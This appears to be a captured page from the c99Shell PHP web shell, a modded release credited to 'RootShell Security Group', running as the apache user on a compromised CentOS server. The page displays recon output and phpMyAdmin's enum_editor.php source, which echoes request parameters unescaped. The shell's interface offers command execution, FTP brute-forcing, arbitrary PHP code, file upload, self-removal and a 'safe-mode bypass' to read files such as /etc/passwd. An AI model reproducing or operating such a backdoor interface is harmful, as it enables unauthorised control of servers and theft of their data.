!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 52.61 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     enum_editor.php (3.46 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 * Displays a form for editing ENUM and SET values with more space (as an alternative to doing it in tbl_alter.php)
 * This form is only for users with JavaScript disabled -- users with JavaScript enabled will see a different form
 * defined in tbl_properties.inc.php
 * @package phpMyAdmin
 */

require_once './libraries/common.inc.php';
require_once './libraries/header_http.inc.php';
require_once './libraries/header_meta_style.inc.php';
?>

</head>

<body>
    <form action="enum_editor.php" method="get">
        <div id="enum_editor_no_js">
            <h3><?php printf(__('Values for the column "%s"'), htmlspecialchars($_GET['field'])); ?></h3>
            <p><?php echo __('Enter each value in a separate field.'); ?></p>
            <div id="values">
            <?php
                $values = array();
                if (isset($_GET['values'])) { // This page was displayed when the "add a new value" link or the link in tbl_alter.php was clicked
                    $values = explode(',', urldecode($_GET['values']));
                } elseif (isset($_GET['num_fields'])) { // This page was displayed from submitting this form
                    for($field_num = 1; $field_num <= $_GET['num_fields']; $field_num++) {
                        $values[] = "'" . str_replace(array("'", '\\'), array("''", '\\\\'), $_GET['field' . $field_num]) . "'";
                    }
                }
                // Display the values in text fields, excluding empty strings
                $field_counter = 0;
                foreach($values as $value) {
                    if(trim($value) != "") {
                        $field_counter++;
                        echo sprintf('<input type="text" size="30" value="%s" name="field' . $field_counter . '" />', htmlspecialchars(str_replace(array("''", '\\\\', "\\'"), array("'", '\\', "'"), substr($value, 1, -1))));
                    }
                }

                $total_fields = $field_counter;
                // If extra empty fields are added, display them
                if(isset($_GET['extra_fields'])) {
                    $total_fields += $_GET['extra_fields'];
                    for($i = $field_counter+1; $i <= $total_fields; $i++) {
                        echo '<input type="text" size="30" name="field' . $i . '"/>';
                    }
                } else {
                    $_GET['extra_fields'] = 0;
                }

            ?>
            </div>
            <p>
               <a href="enum_editor.php?token=<?php echo urlencode($_GET['token']); ?>&field=<?php echo urlencode($_GET['field']); ?>&extra_fields=<?php echo $_GET['extra_fields'] + 1; ?>&values=<?php echo urlencode(join(",", $values)); ?>">
<?php echo __('+ Restart insertion and add a new value'); ?>
               </a>
            </p>
             <input type="hidden" name="token" value="<?php echo $_GET['token']; ?>" />
             <input type="hidden" name="field" value="<?php echo $_GET['field']; ?>" />
             <input type="hidden" name="num_fields" value="<?php echo $total_fields; ?>" />
             <input type="submit" value="<?php echo __('Go'); ?>" />
        </form>

        <div id="enum_editor_output">
        <h3><?php echo __('Output'); ?></h3>
        <p><?php echo __('Copy and paste the joined values into the "Length/Values" field'); ?></p>
            <textarea id="joined_values" cols="95" rows="5"><?php echo join(",", $values); ?></textarea>
        </div>
    </div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0062 ]--